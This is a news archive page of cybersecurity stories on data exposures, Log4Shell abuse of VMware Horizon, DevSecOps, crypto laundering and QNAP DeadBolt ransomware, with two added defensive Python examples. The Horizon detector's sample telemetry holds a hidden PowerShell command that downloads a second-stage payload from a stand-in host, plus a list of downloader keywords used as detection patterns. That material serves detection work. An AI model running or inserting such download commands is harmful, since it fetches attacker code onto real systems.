Category Archives: News

Data Breach at Drug Screening Lab

A configuration error has caused a prolonged data breach at a Florida county’s drug screening laboratory.

The security incident occurred at St. Lucie County’s Drug Screening Lab (SLC Lab), which supplies drug testing services for employment, court cases and other purposes.

In a statement released January 20 2022, County leaders said that a misconfiguration detected in the lab’s website portal had inadvertently made some of the portal users’ personal data accessible for more than four years.

“Upon learning of this issue, SLC Lab corrected the misconfiguration and immediately launched an investigation in consultation with outside cybersecurity professionals who regularly investigate and analyze these types of incidents,” said the officials. 

“SLC Lab devoted considerable time and effort to determine what information may have been accessible to unauthorized users.”

A digital forensic investigation was launched to determine what data had been exposed by mistake. 

The County said: “SLC Lab discovered on December 28 2021 that the website portal misconfiguration allowed for data to be accessible to certain portal users between June 2 2017 and October 13 2021.”

Data exposed in the incident included full names and one or more of the following: Social Security numbers, dates of birth and limited lab test type and result information.

“To date, SLC Lab is not aware of any reports of identity fraud or improper use of any information as a direct result of this incident,” said the County. 

On January 20, the lab began notifying affected individuals of the security incident by letter and encouraging them to enroll in complimentary credit monitoring services. County leaders did not state how many residents of St. Lucie County may have had their data compromised.

St. Lucie County spokesman Erick Gill told WPTV that the mistake impacted no other data in the care of the county. 

“SLC Lab is committed to maintaining the privacy of personal information in its possession and has taken many precautions to safeguard it,” said Gill. 

He added: “SLC Lab continually evaluates and modifies its practices to enhance the security and privacy of the personal information it maintains.”

Hacker Flags Flaw in Swiss Railway System

An anonymous hacker has raised the alarm after discovering a vulnerability impacting Switzerland’s national railway system.

The flaw allowed the hacker to gain access to personal data belonging to around 500,000 individuals who had purchased tickets to ride on Swiss Federal Railways (SFR).

After detecting a weak spot in SFR’s Swiss Card system, the hacker reported it to the Rundschau show, which airs on Swiss public television, SRF.

Information left vulnerable by the flaw included travelers’ names, dates of birth, the number of first- and second-class tickets they purchased, places of departure and final destinations.

Speaking to the Rundschau program, the hacker said that anyone could have easily viewed the data as no specialist IT knowledge was needed to exploit the flaw. 

“The sensitive data was practically public on the internet,” said the hacker. 

The security breach was reported to Switzerland’s Federal Data Protection Commissioner. 

According to Swiss news site Swiss Info, the data compromised by the hacker was never made public and has since been secured by SFR. 

The hacker said that their motivation in exploiting the flaw was to expose its existence in the hope of averting a potentially malicious cyber-attack. 

“This is a huge meltdown for Swiss Railways,” Otto Hostettler, an author and journalist specializing in cybercrime, told the Rundschau program. 

“Such data can be sold in hacker forums on the dark web. In the wrong hands, it would have great potential for abuse.”

Cyber-criminals have been known to target the Swiss rail industry. In May 2020, hackers stole data from Swiss train manufacturer Stadler Rail and demanded a payment of $6m in Bitcoin for its return.

Following the attack, Stadler released a statement saying that it “is not and has never been willing to make payments to blackmailers and has not entered into negotiations.”

In response to Stadler’s rebuff, the cyber-thieves published images of some of the stolen files on the internet. A message accompanying the images stated that the criminals had swiped no fewer than 10,000 documents from the train maker. 

The company said it had backups of all the data compromised in the attack. 

European nations issue record €1.1 billion in GDPR fines

European data protection authorities have issued fines of €1.1 billion ($1.2 billion) under the General Data Protection Regulation (GDPR) since 28 January 2021, according to the annual GDPR Fines and Data Breach Survey by international law firm DLA Piper.

The survey—which spanned 27 European Union members, the European Economic Association members Norway, Iceland, and Liechtenstein, and now-former EU member the UK—found there was a sevenfold increase in fines in 2021.

Access broker found exploiting Log4j vulnerability in VMware

A gang of cybercriminals known for breaking into computer systems and selling access to them has been discovered exploiting an Apache Log4j vulnerability, Log4Shell, in unpatched VMware Horizon to plant cryptominers and backdoors on targeted systems.

In a blog published Wednesday, BlackBerry researchers Ryan Gibson, Codi Starks and Will Ikard revealed that Prophet Spider was behind the attacks, which could be reliably detected by monitoring ws_TomcatService.exe, the Tomcat service used by VMware Horizon.

The researchers explained that after exploiting the Log4Shell vulnerability to penetrate a system, the attackers use PowerShell commands to download a second-stage payload. In the case of Prophet Spider, the payloads were primarily cryptocurrency mining software, although in some instances, Cobalt Strike beacons—a kind of system backdoor—were also installed on the computers.
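The detection the researchers describe, shells spawned under ws_TomcatService.exe and then a PowerShell download of a second stage, can be expressed as a check over process-creation telemetry. This is an added example, not code from the article or from BlackBerry; the event field names, the download-hint list and the sample events are constructed assumptions.

```python
"""Flag shells spawned under VMware Horizon's Tomcat service (ws_TomcatService.exe).

Added example, not code from the article or from BlackBerry's researchers.
Field names and the sample events are constructed (Sysmon-style) assumptions.
"""
from dataclasses import dataclass

HORIZON_TOMCAT = "ws_tomcatservice.exe"          # never spawns shells in normal use
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line fragments that suggest a second-stage download (case-insensitive).
DOWNLOAD_HINTS = ("invoke-webrequest", "downloadstring", "downloadfile",
                  "start-bitstransfer", "iwr ", "curl ", "wget ")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # file name of the new process image
    cmdline: str


def ancestor_images(event, by_pid, limit=8):
    """Image names of the parent, grandparent, ... up to `limit` levels."""
    chain = []
    cur = by_pid.get(event.ppid)
    while cur is not None and len(chain) < limit:
        chain.append(cur.image.lower())
        cur = by_pid.get(cur.ppid)
    return chain


def detect_horizon_shell_spawn(events):
    """Return (pid, severity) for each shell descended from ws_TomcatService.exe.

    Severity is 'high' when the command line also looks like a downloader,
    which is the second-stage behaviour the article describes.
    """
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if e.image.lower() not in SHELLS:
            continue
        if HORIZON_TOMCAT not in ancestor_images(e, by_pid):
            continue
        downloader = any(h in e.cmdline.lower() for h in DOWNLOAD_HINTS)
        alerts.append((e.pid, "high" if downloader else "medium"))
    return alerts


# Constructed sample telemetry, not data from a real incident.
SAMPLE_EVENTS = [
    ProcEvent(400, 4, "services.exe", "services.exe"),
    ProcEvent(1200, 400, "ws_TomcatService.exe", "ws_TomcatService.exe -service"),
    ProcEvent(1300, 1200, "cmd.exe", "cmd.exe /c powershell.exe -File C:\\Windows\\Temp\\s.ps1"),
    ProcEvent(1310, 1300, "powershell.exe",
              "powershell.exe -nop -w hidden -c Invoke-WebRequest -Uri http://example.invalid/stage2 -OutFile C:\\Windows\\Temp\\s.ps1"),
    ProcEvent(2000, 400, "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(2100, 2000, "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),  # benign: not under Tomcat
]

if __name__ == "__main__":
    for pid, severity in detect_horizon_shell_spawn(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} severity={severity}")
```

The parent-chain walk matters because the shell is often one hop removed (cmd.exe in between), so a rule that only matches the immediate parent would miss the PowerShell download stage.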

Mentoring and Role Models Key to Improving Female Representation in Cybersecurity

The importance of mentoring and role models in helping women develop careers in cybersecurity was emphasized during the HackerOne Women in Cybersecurity Press Roundtable.

The panel, which comprised a range of leading female figures in the cybersecurity industry, discussed practical ways of improving gender diversity in the industry.

Marjorie Janiewicz, chief revenue officer at HackerOne, began by setting out a bleak picture regarding cyber’s gender imbalance. “It’s no secret that the cyber skills gap is rapidly growing, and women continue to be a minority in technical and cyber roles. We especially notice that underrepresentation in leadership roles,” she outlined.

The panelists then highlighted personal experiences that inspired them to successful careers in cyber. Keren Elazari, a cybersecurity analyst, researcher, author and speaker, described initially feeling “lonely” operating in the industry as an anonymous white hat hacker. However, when attending her first hacker conference, Y2hacK, she became inspired mixing and interacting with like-minded people. In addition, while there were only three women present at the event, “the fact the organizer of the event was a woman, that gave me the signal that although I don’t see anyone that looks like me around, there’s space for me in this community.”

Sandra McLeod, head of security assurance at Zoom, similarly emphasized the importance of role models during her career. “I had the opportunity to work among and alongside some incredible top talent that I learned from and had some amazing mentors who encouraged me to take that next step.”

While the panelists had female role models they could look up to while navigating the start of their career in the industry, this is often not the case for many women. Lynn Dohm, executive director of Women in CyberSecurity, noted: “It’s hard to be what you cannot see and when you have that power of community and you have those women in front of you that you aspire to be, it builds up your confidence and strength to think ‘yes this is a place where we belong’ and we can advance in our careers.”

Therefore, a key means of enabling women to succeed in cyber is “creating the power of community where there is that collective strength as a network and as a community to grow and expand our cyber careers collectively.”

Annika Erikson, senior security manager at Salesforce, concurred, explaining how mentoring helped open doors to her in the industry. “I’ve had mentors, both women and men, that have invited me to tables I would never have invited myself to and brought me into conversations.” She said that these experiences “gave me the confidence to then invite myself to more discussions.”

Erikson added that she now offers the same mentoring opportunities to help others in the sector. “Anybody can be a mentor to anyone in their organization or across organizations and invite them into those discussions and conversations. This will let them know their contributions are extremely valuable,” she commented.

DevSecOps plan process

In the DevOps and DevSecOps Introduction, What is DevOps, we reviewed how our security teams overlay onto DevOps for visibility and increased security throughout the software lifecycle. This article explores DevSecOps during the planning phase of the project and why it’s important for developers to be trained on how to help protect the software they are writing from Free Open-Source Software “FOSS” risks and supply chain attacks.

Development’s role in DevSecOps

Development teams that have an Agile culture will be familiar with DevOps frameworks and the ability to deal with rapid change effectively. As developers work through user stories, they may search for available FOSS that is useful and speeds up the user story delivery. DevSecOps collaboration with developers during this process helps protect user stories from the risks associated with using FOSS and supply chain attacks.

Free Open-Source Software “FOSS” risks

Arguably the most popular FOSS is the Linux operating system released in 1991 by Linus Torvalds. It is free to use, and the source code is publicly available. The copyleft license type that covers Linux requires a developer who modifies certain parts of the Linux operating system to share the source code they created. The two main categories of FOSS licenses are copyleft and permissive.

Copyleft license means that the software author has a claim on the copyright of their work, and anyone that uses, modifies, or shares the work must make their code publicly available. A developer in a private company that adds to or modifies copyleft licensed software could be forced to expose proprietary code or trade secrets. An example of a copyleft license is GNU v2 created by Richard Stallman.

Permissive license allows much more freedom to the developer when adding to or modifying the software and generally requires nothing in return. Some permissive licenses attach more requirements than others. But in general, they are less risky for a business to use with proprietary software. An example of a permissive license is the MIT License, created at the Massachusetts Institute of Technology.

The US Courts have set a precedent in favor of the FOSS author when there is a dispute, which is why the organization’s security and compliance teams should create a policy providing an authorized list of FOSS licenses for use within the organization. Developers should consult with Security and Compliance teams for any additional questions or requests for FOSS exceptions.

The collaboration of the team will protect the company from potentially having to share proprietary software, paying fines, or defending itself in litigation. More importantly, protecting proprietary software from a FOSS license violation can also limit the risk of a supply chain attack.

Supply chain attacks

In 2020, the network monitoring company SolarWinds unknowingly distributed malicious software to their customers. It was a huge event that went unnoticed for months and exposed many well-known technology companies to hackers. Evidence of the incident showed that malicious software was injected into the SolarWinds Orion software during the build process. When the new version of software was released to customers, hackers were unknowingly granted access to systems.

Supply chain attacks occur when developers include (accidentally or intentionally) FOSS that is malicious or contains vulnerabilities with their own software during the build process. With it embedded in the developer’s software release, the malicious software acts like a trojan horse. Once it’s been installed by a user, the malicious software activates and either waits for commands from the controller or starts performing pre-defined actions like a ransomware attack, obtaining login and password credentials, or scanning the network for other places it can jump to. Below are some of the common ways supply chain attacks happen along with how DevSecOps can work with developer teams to prevent these during the planning process.

Compromised software updates – Software developers release patches and updates to their software on a regular cadence. DevSecOps helps protect users by making sure developers only use software updates that come from a valid and protected source.
Inherent defects in FOSS – FOSS is not immune to bugs, security flaws, and malicious actors. DevSecOps advises software developers to pull FOSS from reputable public repositories. Developers should also search the version history for security issues or concerns before implementing FOSS into their software builds.
FOSS download limitations – FOSS from public repositories and registries have a limited number of daily downloads for free. Large development organizations can quickly exceed these daily downloads which can result in failed software builds or delay a planned production deployment. DevSecOps can provide private repositories and registries for developers to store FOSS that is under the control of the business and has unlimited downloads.
Manual steps in a build and release process – Developers should plan their projects around the use of automated build and release pipelines. Pipelines allow DevSecOps to use security scanning tools to identify malicious software.

Licensing and supply chain attacks can expose business systems to serious risks and be very difficult to eliminate when embedded in a software release. Planning with DevSecOps helps software developers navigate the risks associated with FOSS and supply chain attacks.
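The planning controls above (an authorized FOSS license list with compliance exceptions, a business-controlled private registry as the only valid download source, and a pinned artifact hash the pipeline can verify) can be enforced as a single dependency gate. This is an added example, not code from the article; the policy values, the registry host name and the manifest entries are constructed assumptions.

```python
"""Planning-phase dependency gate for a build pipeline.

Added example, not code from the article. It applies three planning
controls to a constructed dependency manifest: an authorized FOSS license
list (copyleft needs a compliance exception), an approved private registry
as the only valid download source, and a pinned integrity hash. The policy
values, registry host and manifest below are assumptions for illustration.
"""
from urllib.parse import urlparse

# Authorized (permissive) licenses; anything else needs a compliance exception.
AUTHORIZED_LICENSES = {"MIT", "Apache-2.0", "BSD-2-Clause", "BSD-3-Clause", "ISC"}
# Copyleft families are named separately so the finding explains the risk.
COPYLEFT_PREFIXES = ("GPL-", "AGPL-", "LGPL-")
# The business-controlled private registry (hypothetical host name).
APPROVED_REGISTRY_HOSTS = {"registry.internal.example"}


def check_dependency(dep, exceptions=frozenset()):
    """Return a list of policy findings for one dependency; empty means allowed."""
    findings = []
    name = dep["name"]
    lic = dep.get("license", "UNKNOWN")
    if lic not in AUTHORIZED_LICENSES and name not in exceptions:
        if lic.startswith(COPYLEFT_PREFIXES):
            findings.append(f"{name}: copyleft license {lic}; modifying it may require "
                            "publishing proprietary code; request a compliance exception")
        else:
            findings.append(f"{name}: license {lic} is not on the authorized list")
    host = urlparse(dep.get("source", "")).hostname
    if host not in APPROVED_REGISTRY_HOSTS:
        findings.append(f"{name}: source host {host!r} is not the approved private registry")
    digest = dep.get("sha256", "").lower()
    if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
        findings.append(f"{name}: no valid pinned sha256; the build cannot verify the artifact")
    return findings


def gate_manifest(manifest, exceptions=frozenset()):
    """Run every check; returns {name: findings} for dependencies that fail."""
    failures = {}
    for dep in manifest:
        findings = check_dependency(dep, exceptions)
        if findings:
            failures[dep["name"]] = findings
    return failures


# Constructed manifest, not a real project's dependencies.
MANIFEST = [
    {"name": "fastjson-lite", "version": "1.4.2", "license": "MIT",
     "source": "https://registry.internal.example/npm/fastjson-lite/-/fastjson-lite-1.4.2.tgz",
     "sha256": "a" * 64},
    {"name": "imgtools", "version": "3.0.0", "license": "GPL-2.0-only",
     "source": "https://registry.internal.example/pypi/imgtools/imgtools-3.0.0.tar.gz",
     "sha256": "b" * 64},
    {"name": "leftpad-ng", "version": "0.9.1", "license": "MIT",
     "source": "https://registry.npmjs.org/leftpad-ng/-/leftpad-ng-0.9.1.tgz",
     "sha256": ""},
]

if __name__ == "__main__":
    for name, findings in gate_manifest(MANIFEST).items():
        for line in findings:
            print("BLOCK", line)
```

Running the gate in the pipeline before the build step turns the policy into a hard stop, so a copyleft package or an unpinned download from a public registry fails early instead of being discovered in a release.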

Next steps

When planning is complete and developers begin coding their software, they need a secure place to store and protect their work. The next article will cover how we secure repositories to protect the company’s proprietary code.

Nearly $9bn Laundered in Cryptocurrency in 2021

Threat actors laundered $8.6bn in cryptocurrency last year, although the real figure could be much higher when “non-crypto” crimes are included, according to Chainalysis.

The firm provides analysis and investigation software to help shine a light on the murky world of blockchains and decentralized finance (DeFi).

Findings released yesterday from an upcoming report revealed a 30% year-on-year increase in the value associated with money laundering activity via cryptocurrency in 2021.

However, that’s not the whole story.

“We also need to note that these numbers only account for funds derived from ‘cryptocurrency-native’ crime, meaning cyber-criminal activity such as darknet market sales or ransomware attacks in which profits are virtually always derived in cryptocurrency rather than fiat currency,” the firm explained.

“It’s more difficult to measure how much fiat currency derived from offline crime – traditional drug trafficking, for example – is converted into cryptocurrency to be laundered. However, we know anecdotally this is happening.”

Despite its reputation for being something of a Wild West, it’s easier to monitor money laundering efforts where cryptocurrency is involved because of the transparent nature of blockchains.

To that end, DeFi protocols received the majority of illicit funds last year, the first since 2018 where centralized exchanges haven’t been the number one recipient, according to Chainalysis.

That amounts to a 1,964% year-on-year increase in total value received by DeFi protocols from illicit addresses to a total of $900m in 2021. North Korean hackers, who stole an estimated $400m of cryptocurrency last year, were heavy users of DeFi, Chainalysis claimed.

The good news is that money laundering is still concentrated on a small number of services, although slightly less so than in 2020.

The analysis revealed that over half (55%) of all cryptocurrency sent from illicit addresses went to only 270 service deposit addresses.

Among these addresses were those associated with two exchanges sanctioned by the US Treasury last year: Suex and Chatex.

“Law enforcement can strike a huge blow against cryptocurrency-based crime and significantly hamper criminals’ ability to access their digital assets by disrupting these services,” Chainalysis claimed.

QNAP: Act Now to Mitigate DeadBolt Ransomware

A leading maker of network-attached storage (NAS) devices is urging customers to upgrade to the latest software version and reconfigure their systems in order to thwart a new ransomware campaign.

Taiwan vendor QNAP released a statement yesterday in response to the mounting threat from a new variant known as “DeadBolt.”

It advised customers to ensure their devices are not exposed to the internet, by opening the Security Counselor and checking if the dashboard displays the following message: “The System Administration service can be directly accessible from an external IP address via the following protocols: HTTP.”

If it does, organizations should check the Virtual Server, NAT or port forwarding settings, and disable the port forwarding setting of the NAS management service port – which, by default, means ports 8080 and 443.

Next, they should disable UPnP by going to “myQNAPcloud” on the QTS menu, clicking “Auto Router Configuration,” and de-selecting “Enable UPnP port forwarding,” the vendor explained.

“DeadBolt has been widely targeting all NAS exposed to the internet without any protection and encrypting users’ data for Bitcoin ransom,” it warned.

“QNAP urges all QNAP NAS users to follow the security setting instructions below to ensure the security of QNAP NAS and routers, and immediately update QTS to the latest available version.”

The threat actors behind DeadBolt are purportedly claiming to leverage a zero-day exploit in their attacks, which would presumably work even on updated QTS versions. However, disconnecting from the internet would keep organizations safe.

“Organizations right now should have critical insight into the use of SSH and Telnet into their QNAP devices as well as connections on port 8080 and 443 emanating from their QNAPs and historic levels of UPnP traffic,” advised Armis cyber risk officer, Andy Norton.

“There are threads surfacing on some of the support forums, where the decryption key did not work after payment, but it is also possible to remove DeadBolt using other utilities on the QNAP device.”

A report out yesterday warned that vulnerability exploits are an increasingly popular initial access vector for ransomware gangs, with the number of bugs associated with such attacks jumping 29% year-on-year in 2021.

This is far from the first time QNAP customers have been targeted by ransomware. Over the past year, AgeLocker and eCh0raix variants prompted warnings from the vendor.

12 steps to take when there’s an active adversary on your network

CISOs know they must respond quickly and effectively to an incident, yet surveys point to continuing challenges to deliver on that goal.

The State of Incident Response 2021 report, from tech companies Kroll, Red Canary and VMware, surveyed more than 400 IS professionals and 100 legal and compliance leaders and found that 45% of them identified inadequacies in detection and response resources. Additionally, 55% wanted to improve time to containment and incident response automation.

There are compelling reasons for investing in improved incident response.
